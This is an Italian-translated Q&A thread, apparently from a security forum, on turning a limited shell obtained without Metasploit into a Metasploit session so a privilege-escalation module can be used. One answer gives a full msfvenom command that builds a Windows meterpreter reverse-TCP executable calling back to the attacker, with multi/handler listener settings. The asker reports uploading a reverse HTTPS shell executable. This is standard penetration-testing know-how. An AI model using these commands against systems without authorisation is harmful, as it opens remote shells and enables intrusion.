È necessario un ID sessione per eseguire un'escalation di privilegi. Il modulo MSF funziona

3

Ho una shell limitata su una macchina e vorrei usare un modulo Metasploit per aumentare i privilegi. Problema: non ho ottenuto la shell limitata con un modulo metasploit e il modulo metasploit per escalation richiede un ID sessione.

Quindi la mia domanda è: come posso trasformare la mia shell limitata (che ottengo senza metasploit) in una sessione di metasploit?

    
posta adrTuIPKJ44 19.10.2016 - 14:55
fonte

2 risposte

2

È possibile generare un eseguibile specifico della piattaforma con msfvenom. Ad esempio:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<yourport> -f exe > meter.exe

Porta quell'exe al bersaglio attraverso il tuo guscio limitato. Quindi si avvia un listener in metasploit:

use exploit/handler/multi (or exploit/multi/handler, don't remember)
set payload windows/meterpreter/reverse_tcp (needs to be the same as above)
set LHOST <your ip>
set LPORT <your port> (these 2 need to be the same as above)
run

e dopo di ciò si avvia l'exe sul bersaglio. Quindi dovresti ottenere una sessione di meterpreter. Fammi sapere se non funziona ancora.

    
risposta data 19.10.2016 - 15:03
fonte
1

Ok, finalmente l'ho fatto. Proverò a spiegare quello che ho fatto.

Volevo ottenere una shell meterpreter su una macchina su cui ero già abile per avere una shell (ma senza Metasploit). Il motivo per cui volevo una shell meterpreter è perché ho bisogno di una sessione Metasploit per utilizzare un modulo Metasploit per l'escalation dei privilegi.

Quindi volevo usare la mia shell php_reverse per le macchine Windows (che non è un exe ma un php e funziona solo su macchine Windows) con Multi / Handler, ma non è possibile (e non c'è equivalente nella libreria Metasploit, Ho controllato più volte).   Così ho finalmente caricato https_reverse_shell in formato .exe e ho avuto la possibilità di usare Multi / Handler.

    
risposta data 19.10.2016 - 16:04
fonte

Leggi altre domande sui tag